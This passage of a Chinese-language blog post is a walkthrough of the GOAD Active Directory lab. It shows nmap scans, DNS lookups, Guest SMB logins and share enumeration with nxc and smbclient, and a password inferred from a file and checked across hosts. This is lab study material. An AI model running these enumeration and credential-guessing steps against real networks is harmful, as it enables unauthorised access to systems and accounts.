commonName=castelblack.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-30T03:06:25<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2026-11-29T03:06:25<\/li>\n\n\n\n<li><a><\/a>| rdp-ntlm-info:<\/li>\n\n\n\n<li><a><\/a>| Target_Name: NORTH<\/li>\n\n\n\n<li><a><\/a>| NetBIOS_Domain_Name: NORTH<\/li>\n\n\n\n<li><a><\/a>| NetBIOS_Computer_Name: CASTELBLACK<\/li>\n\n\n\n<li><a><\/a>| DNS_Domain_Name: north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| DNS_Computer_Name: castelblack.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| DNS_Tree_Name: sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| Product_Version: 10.0.17763<\/li>\n\n\n\n<li><a><\/a>|_ System_Time: 2026-05-31T06:59:36+00:00<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.<\/li>\n\n\n\n<li><a><\/a>5985\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)<\/li>\n\n\n\n<li><a><\/a>|_http-title: Not Found<\/li>\n\n\n\n<li><a><\/a>|_http-server-header: Microsoft-HTTPAPI\/2.0<\/li>\n\n\n\n<li><a><\/a>5986\/tcp open ssl\/wsmans?<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.<\/li>\n\n\n\n<li><a><\/a>| tls-alpn:<\/li>\n\n\n\n<li><a><\/a>| h2<\/li>\n\n\n\n<li><a><\/a>|_ http\/1.1<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=VAGRANT<\/li>\n\n\n\n<li><a><\/a>| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-29T19:20:59<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2029-05-28T19:20:59<\/li>\n\n\n\n<li><a><\/a>47001\/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)<\/li>\n\n\n\n<li><a><\/a>|_http-server-header: Microsoft-HTTPAPI\/2.0<\/li>\n\n\n\n<li><a><\/a>|_http-title: Not Found<\/li>\n\n\n\n<li><a><\/a>49664\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49665\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49666\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49667\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49668\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49669\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>49670\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>55452\/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM<\/li>\n\n\n\n<li><a><\/a>| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback<\/li>\n\n\n\n<li><a><\/a>| Not valid before: 2026-05-31T03:46:28<\/li>\n\n\n\n<li><a><\/a>|_Not valid after: 2056-05-31T03:46:28<\/li>\n\n\n\n<li><a><\/a>| ms-sql-info:<\/li>\n\n\n\n<li><a><\/a>| 192.168.56.22:55452:<\/li>\n\n\n\n<li><a><\/a>| Version:<\/li>\n\n\n\n<li><a><\/a>| name: Microsoft SQL Server 2019 RTM<\/li>\n\n\n\n<li><a><\/a>| number: 15.00.2000.00<\/li>\n\n\n\n<li><a><\/a>| Product: Microsoft SQL Server 2019<\/li>\n\n\n\n<li><a><\/a>| Service pack level: RTM<\/li>\n\n\n\n<li><a><\/a>| Post-SP patches applied: false<\/li>\n\n\n\n<li><a><\/a>|_ TCP port: 55452<\/li>\n\n\n\n<li><a><\/a>|_ssl-date: 2026-05-31T06:59:44+00:00; -4s from scanner time.<\/li>\n\n\n\n<li><a><\/a>| ms-sql-ntlm-info:<\/li>\n\n\n\n<li><a><\/a>| 192.168.56.22:55452:<\/li>\n\n\n\n<li><a><\/a>| Target_Name: NORTH<\/li>\n\n\n\n<li><a><\/a>| NetBIOS_Domain_Name: NORTH<\/li>\n\n\n\n<li><a><\/a>| NetBIOS_Computer_Name: CASTELBLACK<\/li>\n\n\n\n<li><a><\/a>| DNS_Domain_Name: north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| DNS_Computer_Name: castelblack.north.sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>| DNS_Tree_Name: sevenkingdoms.local<\/li>\n\n\n\n<li><a><\/a>|_ Product_Version: 10.0.17763<\/li>\n\n\n\n<li><a><\/a>57413\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>57437\/tcp open msrpc Microsoft Windows RPC<\/li>\n\n\n\n<li><a><\/a>MAC Address: 08:00:27:A2:3A:39 (Oracle VirtualBox virtual NIC)<\/li>\n\n\n\n<li><a><\/a>Service Info: OS: Windows; CPE: cpe:\/o:microsoft:windows<\/li>\n\n\n\n<li><a><\/a><a><\/a>Host script results:<\/li>\n\n\n\n<li><a><\/a>| smb2-time:<\/li>\n\n\n\n<li><a><\/a>| date: 2026-05-31T06:59:35<\/li>\n\n\n\n<li><a><\/a>|_ start_date: N\/A<\/li>\n\n\n\n<li><a><\/a>| smb2-security-mode:<\/li>\n\n\n\n<li><a><\/a>| 3.1.1:<\/li>\n\n\n\n<li><a><\/a>|_ Message signing enabled but not required<\/li>\n\n\n\n<li><a><\/a>|_nbstat: NetBIOS name: CASTELBLACK, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:a2:3a:39 (Oracle VirtualBox virtual NIC)<\/li>\n\n\n\n<li><a><\/a>|_clock-skew: mean: -4s, deviation: 0s, median: -4s<\/li>\n\n\n\n<li><a><\/a><a><\/a>Service detection performed. Please report any incorrect results at <a href=\"https:\/\/nmap.org\/submit\/\">https:\/\/nmap.org\/submit\/<\/a>&nbsp;.<\/li>\n\n\n\n<li><a><\/a>Nmap done: 3 IP addresses (3 hosts up) scanned in 138.62 seconds<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><a><\/a><strong>\u5173\u952e\u7aef\u53e3\u4e0e\u670d\u52a1\u901f\u89c8<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u592a\u591a\u4e86\uff0c\u6311\u51e0\u4e2a\u91cd\u8981\u7684<\/p>\n\n\n\n<h1 class=\"wp-block-heading\"><a><\/a><strong>\u62d3\u6251\u786e\u8ba4<\/strong><strong><\/strong><\/h1>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a>192.168.56.10 KINGSLANDING DC01 sevenkingdoms.local<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>192.168.56.11 WINTERFELL DC02 north.sevenkingdoms.local<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>192.168.56.22 CASTELBLACK SRV02 north.sevenkingdoms.local<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u6216\u8005nxc smb 192.168.56.0\/24<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-79.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"332\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-79.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2136\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u66f4\u5feb\u5730\u6982\u62ec\u4e00\u4e0b\u8fd9\u4e09\u53f0\u4e3b\u673a\u7684\u5173\u952e\u670d\u52a1\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a><\/a>DC01\uff1a<\/li>\n\n\n\n<li><a><\/a>53 DNS80 IIS \/ ADCS Web Enrollment88 Kerberos389\/636 LDAP\/LDAPS3268\/3269 Global Catalog445 SMB signing required3389 RDP5985\/5986 WinRM<\/li>\n\n\n\n<li><a><\/a>DC02\uff1a<\/li>\n\n\n\n<li><a><\/a>53 DNS88 Kerberos389\/636 LDAP\/LDAPS3268\/3269 Global Catalog445 SMB signing required3389 RDP5985\/5986 WinRM<\/li>\n\n\n\n<li><a><\/a>SRV02\uff1a<\/li>\n\n\n\n<li><a><\/a>80 IIS445 SMB signing enabled but not required1433 MSSQL55452 MSSQL dynamic port3389 RDP5985\/5986 WinRM<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SRV02 \u7684 SMB signing \u201cenabled but not required\u201d \uff0c\u91cd\u70b9\u5f88\u9ad8\uff0c\u540e\u9762\u505aSMB\u679a\u4e3e\uff0cResponder\/LLMNR\u3001NTLM relay \u76f8\u5173\u590d\u73b0\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5148\u628a\u57df\u540d\u3001DC\u3001SMB \u7b56\u7565\u3001\u533f\u540d\u8bbf\u95ee\u60c5\u51b5\u786e\u8ba4\u6e05\u695a<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><a><\/a><strong>\u57df\u4fe1\u606f\u679a\u4e3e<\/strong><strong><\/strong><\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>dig @192.168.56.10 -t SRV _ldap._tcp.sevenkingdoms.local<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8fd4\u56de\uff1a_ldap._tcp.sevenkingdoms.local. 600 IN SRV 0 100 389 kingslanding.sevenkingdoms.local.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>LDAP\u7aef\u53e3\u662f389\uff0c\u670d\u52a1\u5668\u662fkingslanding.sevenkingdoms.local<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-80.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"452\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-80.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2137\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<pre class=\"wp-block-code\"><code><a><\/a>dig @192.168.56.10 -t SRV _kerberos._tcp.sevenkingdoms.local<\/code><\/pre>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8fd4\u56de\uff1a_kerberos._tcp.sevenkingdoms.local. 600 IN SRV 0 100 88 kingslanding.sevenkingdoms.local.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>Kerberos \u7aef\u53e3\u662f88\uff0cKerberos \u8ba4\u8bc1\u670d\u52a1\u5668\u662f kingslanding.sevenkingdoms.local<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-81.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"485\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-81.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2138\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>dig @192.168.56.11 -t SRV _ldap._tcp.north.sevenkingdoms.local<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5b50\u57df192.168.56.11\u4e2d<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>_ldap._tcp.north.sevenkingdoms.local. 600 IN SRV 0 100 389 winterfell.north.sevenkingdoms.local.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>north.sevenkingdoms.local\u7684LDAP\u670d\u52a1\u5668\u662fwinterfell\uff0c\u7aef\u53e3\u662f389<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-82.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"528\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-82.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2139\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><a><\/a><strong><a><\/a>\u533f\u540d\u8bbf\u95ee\u4e0e\u5171\u4eab\u679a\u4e3e<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u6d4b\u7528Guest\u80fd\u4e0d\u80fd\u767b\u5f55SMB<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 -u 'Guest' -p ''<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\\Guest: STATUS_ACCOUNT_DISABLED<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\\Guest:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.11 445 WINTERFELL [-] north.sevenkingdoms.local\\Guest: STATUS_ACCOUNT_DISABLED<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Running nxc against 3 targets \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501      100% 0:00:00<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-83.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"118\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-83.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2140\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>Guest \u7a7a\u5bc6\u7801\u53ef\u4ee5\u767b\u5f55 CASTELBLACK<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u679a\u4e3eGuest\u80fd\u8bbf\u95ee\u54ea\u4e9b\u5171\u4eab<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>nxc smb 192.168.56.22 -u 'Guest' -p '' --shares<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\\Guest:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK [*] Enumerated shares<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK Share Permissions Remark<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK &#8212;&#8211; &#8212;&#8212;&#8212;&#8211; &#8212;&#8212;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK ADMIN$ Remote Admin<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK all READ,WRITE Basic RW share for all<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK C$ Default share<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK IPC$ READ Remote IPC<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>SMB 192.168.56.22 445 CASTELBLACK public Basic Read share for all domain users<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>Guest\u5bf9&#8217;all&#8217;\u6709\u8bfb\u5199\u7684\u6743\u9650<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8fdb\u5165all\u5171\u4eab\u67e5\u770b\u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>smbclient \/\/192.168.56.22\/all -U 'Guest%' -c 'recurse; ls'<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>&nbsp;. D 0 Sun May 31 17:04:31 2026<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;.. D 0 Sun May 31 17:04:31 2026<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>&nbsp;arya.txt A 413 Sun May 31 11:48:39 2026<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>&nbsp;15638527 blocks of size 4096. 8043023 blocks available<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>all\u5171\u4eab\u91cc\u6709\u4e00\u4e2aarya.txt\u6587\u4ef6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u521b\u5efa\u4e00\u4e2a\u6587\u4ef6\u5939\u628a\u6587\u4ef6\u4e0b\u8f7d\u4e0b\u6765<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a><\/a>mkdir -p castelblack-all<\/li>\n\n\n\n<li><a><\/a>smbclient \/\/192.168.56.22\/all -U &#8216;Guest%&#8217; -c &#8216;lcd castelblack-all; get arya.txt&#8217;<\/li>\n\n\n\n<li><a><\/a>cat castelblack-all\/arya.txt<\/li>\n<\/ul>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>Hey Arya,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>I hope this message finds you well. Something urgent has come up, and I have to leave for a while. Don&#8217;t worry; I&#8217;ll be back soon.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>I left a little surprise for you in your room \u2013 the sword You&#8217;ve named &#8220;Needle.&#8221; It felt fitting, given your skills. Take care of it, and it&#8217;ll take care of you.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>I&#8217;ll explain everything when I return. Until then, stay sharp, sis.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><a><\/a>Best,<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>John<\/p>\n<\/blockquote>\n\n\n\n<h1 class=\"wp-block-heading\"><a><\/a><strong>\u5171\u4eab\u4e0e\u51ed\u636e\u7a81\u7834<\/strong><strong><\/strong><\/h1>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u4ece arya.txt \u5230\u521d\u59cb\u51ed\u636e<\/strong><strong><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u5c01\u4fe1\u7684\u5927\u610f\u662f\uff1aJohn \u7ed9\u81ea\u5df1\u7684\u59b9\u59b9\u7559\u4e86\u4e00\u628a\u540d\u4e3a Needle \u7684\u5251\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8fd9\u91cc\u6700\u76f4\u63a5\u7684\u7ebf\u7d22\u662f\u5bc6\u7801\u53ef\u80fd\u4e0e Needle \u6709\u5173\uff0c\u4f46\u7528\u6237\u540d\u8fd8\u9700\u8981\u7ed3\u5408\u540e\u7eed\u679a\u4e3e\u6765\u786e\u8ba4\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8fd9\u91cc\u5148\u7559\u4e00\u4e2a\u7591\u95ee\uff1a\u4ec5\u51ed arya.txt \u53ea\u80fd\u8f83\u5f3a\u5730\u6307\u5411\u5bc6\u7801 Needle\uff0c\u4f46\u7528\u6237\u540d arya.stark \u4e0d\u662f\u53ea\u9760\u8fd9\u5c01\u4fe1\u552f\u4e00\u63a8\u51fa\u7684\uff0c\u800c\u662f\u7ed3\u5408 GOAD \u516c\u5f00\u8d44\u6599\u4e0e\u540e\u7eed\u9a8c\u8bc1\u786e\u8ba4\u7684\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u53c2\u8003\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/cyb3rbyte.medium.com\/goad-part-1-scanning-the-forest-reconnaissance-in-an-active-directory-jungle-53a125bd2486\">https:\/\/cyb3rbyte.medium.com\/goad-part-1-scanning-the-forest-reconnaissance-in-an-active-directory-jungle-53a125bd2486<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/cyb3rbyte.medium.com\/goad-part-2-when-enumeration-bites-back-from-smb-to-r-i-p-ee7708c98b7d\">https:\/\/cyb3rbyte.medium.com\/goad-part-2-when-enumeration-bites-back-from-smb-to-r-i-p-ee7708c98b7d<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/cyb3rbyte.medium.com\/goad-part-3-the-art-of-extraction-roasting-and-poisoning-for-domain-dominance-240aa6490dd1\">https:\/\/cyb3rbyte.medium.com\/goad-part-3-the-art-of-extraction-roasting-and-poisoning-for-domain-dominance-240aa6490dd1<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u6587\u7ae0\u91cc\u76f4\u63a5\u7528 nxc smb live.hosts &#8211;users \u5c31\u679a\u4e3e\u5230\u4e86 samwell.tarly \u7b49\u7528\u6237\u4fe1\u606f\uff1b\u800c\u6211\u7684\u73af\u5883\u62d2\u7edd\u533f\u540d SAMR \u679a\u4e3e\uff0c\u8bf4\u660e\u5f53\u524d GOAD-Light \u7248\u672c\u7684\u9ed8\u8ba4\u7b56\u7565\u4e0e\u6587\u7ae0\u73af\u5883\u5b58\u5728\u5dee\u5f02\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u7528 arya.stark \/ Needle \u8fd9\u7ec4\u51ed\u636e\u505a\u767b\u5f55\u9a8c\u8bc1\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>nxc smb 192.168.56.10 192.168.56.11 192.168.56.22 \\<br>&nbsp;&nbsp;-u 'arya.stark' -p 'Needle'<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-84.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"110\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-84.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2141\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8bf4\u660e\u8fd9\u4e2a\u8d26\u53f7\u80fd\u767b\u9646192.168.56.11\uff0c192.168.56.22<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a><\/a>nxc smb 192.168.56.11 192.168.56.22 \\<\/li>\n\n\n\n<li><a><\/a>&nbsp;-d north.sevenkingdoms.local \\<\/li>\n\n\n\n<li><a><\/a>&nbsp;-u &#8216;arya.stark&#8217; -p &#8216;Needle&#8217; &#8211;shares<\/li>\n<\/ul>\n\n\n\n<p 